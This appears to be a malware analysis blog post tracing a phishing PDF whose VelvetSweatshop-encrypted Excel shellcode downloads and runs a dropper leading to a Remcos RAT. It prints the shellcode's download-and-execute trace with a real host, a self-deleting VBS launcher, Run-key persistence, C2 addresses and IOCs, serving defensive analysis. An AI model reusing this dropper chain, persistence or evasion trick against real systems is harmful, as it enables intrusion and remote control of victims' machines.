After downloading the .eml files, I checked to see if there was any difference between the attachments in the emails. They were all showing the same hash for all emails received.

Time to extract the pdf 19Jun22 ARR Safari.pdf from the email by copying the base64 string and decoding it into a new pdf file.

Using pdf-parser.py (by Didier Stevens) to inspect the pdf and find interesting components of this suspicious document.

$ pdf-parser.py 19Jun22\ ARR\ Safari.pdf -O -a
Comment: 3
XREF: 0
Trailer: 0
StartXref: 1
Indirect object: 47
   27: 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 3, 6, 8, 10, 11, 25, 27, 28, 29, 38, 40, 42, 44, 46
 /Action 1: 7
 /Catalog 1: 2
 /EmbeddedFile 1: 37
 /Filespec 1: 26
 /Font 1: 30
 /ObjStm 1: 1
 /Outlines 1: 4
 /Page 1: 9
 /Pages 1: 5
 /XObject 10: 31, 32, 33, 34, 35, 36, 39, 41, 43, 45
 /XRef 1: 47
Search keywords:
 /JS 1: 7
 /JavaScript 1: 7
 /OpenAction 1: 2
 /AcroForm 1: 2
 /EmbeddedFile 1: 37

The /Javascript and /EmbeddedFile looked interesting and worth further investigation.

The /Javascript object did not contain anything of value, but the /EmbeddedFile, on the other hand, appeared to be a decent chunk in size.

$ pdf-parser.py 19Jun22\ ARR\ Safari.pdf -O -o 37 -d safari.compressed
> obj 37 0
> Type: /EmbeddedFile
> Referencing:
> Contains stream
>
> <<
> /Filter /FlateDecode
> /Type /EmbeddedFile
> /Length 48959
> >>

Using pdf-parser.py , I was able to extract the embedded file from the PDF

$ file safari.compressed
> embedded_file: zlib compressed data

Come to find out that the file was compressed, so I used zlib -flate -uncompress to decompress

$ zlib-flate -uncompress < safari.compressed > safari.encrypted

Checking the file again to discover the file was CDFV2 Encrypted .

$ file safari.raw
> safari_pdf_embedded_file.encrypted: CDFV2 Encrypted

After some searching to figure out what could the password possibly be, I solidified the notion that this was Formbook and thanks to this article I was able to confirm it was VelvetSweatshop. Additionally, the password was a default Microsoft password, VelvetSweatshop.

VelvetSweatshop is a default key stored in Microsoft Excel program code for decryption. It’s a neat trick that attackers can leverage to encrypt malicious Excel files in order to evade static-analysis-based detection systems, while eliminating the need for a potential victim to enter a password.

In order to decrypt, I was able to use msoffcrypto-tool to decrypt the file.

$ msoffcrypto-tool safari.encrypted safari.decrypted -p VelvetSweatshop

Checking the decrypted file, the final format is an Excel document.

$ file safari.decrypted
> safari.decrypted: Microsoft Excel 2007+

As with most MS documents, it was curious to check for any macros.

$ olevba safari.decrypted
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: safari.decrypted
Type: OpenXML
No VBA or XLM macros found.

Oletools yielded no interesting or actionable information.

Next I chose, oledump.py (by Didier Stevens) and used it to check for ole objects.

$ oledump.py safari.decrypted
A: xl/embeddings/oleObject1.bin
  A1: 20 '\x01Ole'
  A2: 1721 '\x01Ole10NAtivE'

An OLE object in the spreadsheet that doesn’t contain macro code, could possibly mean it’s shellcode. Since A2 stream looks larger, let’s extract and see if xorsearch -W can help us find an entry point.

Let’s extract the code with oledump.py.

$ oledump.py -d -s A2 safari.decrypted > shellcode.data

Now we want to search with xorsearch.

$ xorsearch -W shellcode.data
Found XOR 00 position 0000024D: GetEIP method 3 E99C000000
Found ROT 25 position 0000024D: GetEIP method 3 E99C000000
Found ROT 24 position 0000024D: GetEIP method 3 E99C000000
Found ROT 23 position 0000024D: GetEIP method 3 E99C000000
Found ROT 22 position 0000024D: GetEIP method 3 E99C000000
Found ROT 21 position 0000024D: GetEIP method 3 E99C000000
...

xorsearch found a GetEIP method at 0x24D in the A2 stream we exported. We can use this offset with scdbg to emulate the shellcode execution.

Select our shellcode file (shellcode.data) and select the options listed below before launching.

Output from running scdbg.

4014c4 GetProcAddress(ExpandEnvironmentStringsW)
4014f7 ExpandEnvironmentStringsW(%PUBLIC%\vbc.exe, dst=12fbd8, sz=104)
40150c LoadLibraryW(UrlMon)
401527 GetProcAddress(URLDownloadToFileW)
40157f URLDownloadToFileW(http://185.239.243.122/421/vbc.exe, C:\Users\Public\vbc.exe)
401596 LoadLibraryW(shell32)
4015ac GetProcAddress(ShellExecuteW)
4015bb unhooked call to shell32.ShellExecuteW step=40468

In the shellcode, the adversary uses ExpandEnvironmentStringsW to find the Public folder in Windows. Next, they use URLDownloadToFileW to retrieve content from hxxp://185.239.243.122/421/vbc.exe and write it to C:\Users\Public\vbc.exe. Finally, they use ShellExecuteExW to launch vbc.exe.

The endpoint was still live and delivering the payload. So I grabbed the executable to begin Identifying what vbc.exe could be.

0x02 Analysis of Dropped File (vbc.exe)

$ file vbc.exe
vbc.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

As you can see vbc.exe, is compiled in .Net. I will open vbc.exe in DnSpy on my VM.

After opening the the executable in DnSpy, I found that the functions were encoded and I could only assume there were so other parts of the executable that were obfuscated. For easy of reading, I chose to run the De4dot against the the executable to clean it up a bit.

Thats better!

Stepping in to execution, I ran across a byte array called, <<EMPTY_NAME>> .

The byte array, <<EMPTY_NAME>>, is then load with the contents from Documents._22.

Then a MemoryStream variable called memoryStream and loads <<EMPTY_NAME>> byte array.

Next a GZipStream variable called, gzipStream, decompress the contents of memoryStream and stores it in itself.

Lastly, a second MemoryStream called, memoryStream2, copies and coverts the decompressed contents of gzipStream into memoryStream2.

After copying the stream, I can see a PE magic number (0x4D5A) in the _buffer byte array.

What is this binary file?!

Let’s dump and save it for later to analyze.

Right click on the _buffer variable → Show in Memory Window → Memory 1.

I am then shown the Memory Window and my binary file is already highlighted and selected.

Right click → Save Selection → save as dump.exe

After saving the binary, I checked the meta data of the file and I can see it is a .Net DLL called Periodicity.dll.

Ok now that I have that saved, I head back to check and see what comes next with my memoryStream2 buffer.

The variable memoryStream2 is then passed to function that simply calls for System.Reflection.Assembly and loads the binary into memory.

The pointer to the handle of the binary loaded into memory now resides in the assembly_ variable.

Next time we see the assembly_ variable, the process is attempting to retrieve public types defined in the assembly that are visible outside the assembly.

The returned data shows the Module, Name, and Namespace of the exported type.

Next, I found the function, MyPoint() set an array variable with 3 values, that will later be used as arguments for the DLL that was loaded into memory.

"506C6174666F726D4E6F74537570706F72746564457863657074"
"4C37554D"
"PolicyLevel"

Stepping through, I came across the last function that calls the Activator.CreateInstance module and supplies the parameters of the exported type variable (_type) and the array of parameters I mentioned.

After running this last function, the execution of vbc.exe within DnSpy terminates and a new process begins running by the name of iys.exe. This instance is running is running from %AppData%/Roaming directory.

0x03 Analysis of DLL (Periodicity.dll)

Executing .NET dll, Periodicity.dll , via SharpDllLoader, with the parameters I found earlier in my analysis of vbc.exe.

Executable: C:\Users\IEUser\Downloads\SharpDllLoader-master\SharpDllLoader\bin\Release\SharpDllLoader.exe
Arguments: -d "C:\Users\IEUser\Desktop\dump.dll" -c CPeriodCollection -m .ctor -a "506C6174666F726D4E6F7453757070 6F72746564457863657074 4C37554D PolicyLevel"
Working Directory: <path to sharpdllloader>
Break At: Entry Point

This did not work as I thought it would. I am not sure how I am suppose to load this DLL to analyze it but I will read more into the process and hopefully can analyze in the future.

0x04 Dynamic Analysis

Let’s execute the vbc.exe on my sandbox and have Process Hacker, ProcMon, and Wireshark running to capture all the fun bits.

I set my ProcMon filter to watch for what I know so far, the process names vbc.exe and iys.exe.

Wireshark will just be listening all traffic on my network interface.

I let this run for several minutes to make sure I wasn’t missing any delayed executions or networks calls.

I was able to find file drops to %AppData% directory, registry entries, and network activity.

VBS script

VBS script is written to the Temp Folder. Then promptly executed vbc.exe using wscript.exe.

C:\Windows\System32\WScript.exe C:\Users\IEUser\AppData\Local\Temp\install.vbs

The VBS script appeared to have a self delete component.

I used the following Powershell to copy the VBS script before it was deleted.

while (!(Test-Path "C:\Users\IEUser\AppData\Local\Temp\install.vbs")) {}; Copy-Item "C:\Users\IEUser\AppData\Local\Temp\install.vbs" "C:\Users\IEUser\Desktop\install.vbs"

Contents of the install.vbs

WScript.Sleep 1000
Set fso = CreateObject("Scripting.FileSystemObject")
CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\IEUser\AppData\Roaming\iys.exe""", 0
fso.DeleteFile(Wscript.ScriptFullName)

Registry

Registry set HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475 contains binary data. The data look very similar to the unstructured DLL binary array that was loaded into MemoryStream from earlier during our code analysis of vbc.exe.

Registry set HKCU\Software\Microsoft\Windows\CurrentVersion\Run\gtr contains the path to the C:\Users\IEUser\AppData\Roaming\iys.exe to execute upon every startup (Persistence).

Lastly, two entries under HKCU\Software\Remcos-KO7WBT that match known Remcos RAT registry entries structure.

exepath: 9c d6 73 bf e5 0f be a9 5e 14 57 ab f4 aa 59 ec 19 64 9d 8b 9e 09 91 99 e5 e3 1e ee 0c db da cb 05 57 db
ea 8a 65 74 f8 0a 1e 28 9b 42 d8 22 fe 35 01 71 d1 e3 64 74 53 6a 11 af 27 66 18 d5 7a 7f 21 46 1c 14 5b c4 57 ac
e0 f5 8b da 83 4d af
licence: d75ea3de2ad117e4485816ef2a4a46f1

iys.exe

New file written to %AppData%\Roaming\iys.exe.

iys.exe hash matches vbc.exe.

iys.exe uses C:\Users\IEUser\AppData\Roaming\logs.dat as way to log information. Likely related to its C2 activity.

iys.exe was seen making network connections out to 62.197.136.86 over port 3091 and 178.237.33.50 over port 80.

0x05 Additional Findings

I found an interesting choice in icon images stored in the Resources of the executable. Reverse image search of the icon turned out to be the National Emblem of Indonesia, Symbol Garuda Pancasila.

0x06 IOCs

Hash	Filename
d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd	19Jun22 ARR Safari.pdf
5d17b63fe99f0608c79129a296bba3af7c8dcfe17913f93ce67dbda376f6987c	safari_pdf_embedded_file.compressed
25672487eb5df23ce72e6ea101ef4047c1407cb0dcb25e59486f125763a9f69d	safari_pdf_embedded_file.encrypted
e1192a47786ea37fd75864d7b8b9a049b4ab72bad852b052318f863713bc97d7	safari_pdf_embedded_file.decrypted
dac51b15136081c2540d2c4c16372668e5e54c89d233e8b30faaabf7c901bc84	vbc.exe
490a432a796c670a8eb7b93ee1710eb023ab12fcebc7a7225c4d7b030330abb8	shellcode.data

IP
hxxp://185.239.243.122/421/vbc.exe	Dropper
62.197.136.86:3091	C2
178.237.33.50:80	GeoIP Location

Files
C:\Users\Public\vbc.exe	Dropped File Path
%AppData%\Local\Temp\install.vbs	VBS script
%AppData%\Roaming\iys.exe	C2 Log File
%AppData%\Roaming\iys.exe	Persistence RAT Path

Registry
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\gtr	%AppData%\Roaming\iys.exe
HKCU\Software\Remcos-KO7WBT\exepath	Data: 9C D6 73 BF E5 0F BE A9 5E 14 57 AB F4 AA 59 EC
HKCU\Software\Remcos-KO7WBT\licence	Data: D75EA3DE2AD117E4485816EF2A4A46F1
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475	Binary data
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass	1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName	1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet	1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect	0

0x07 Upload

https://www.filescan.io/uploads/62aecf127046ab63f87d6f0c/reports/40faed10-37d6-4273-8c8fb58fcfcd676a/overview

https://bazaar.abuse.ch/sample/d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd/

0x08 References

https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/backdoor.win32.remcos.usmaneaggk/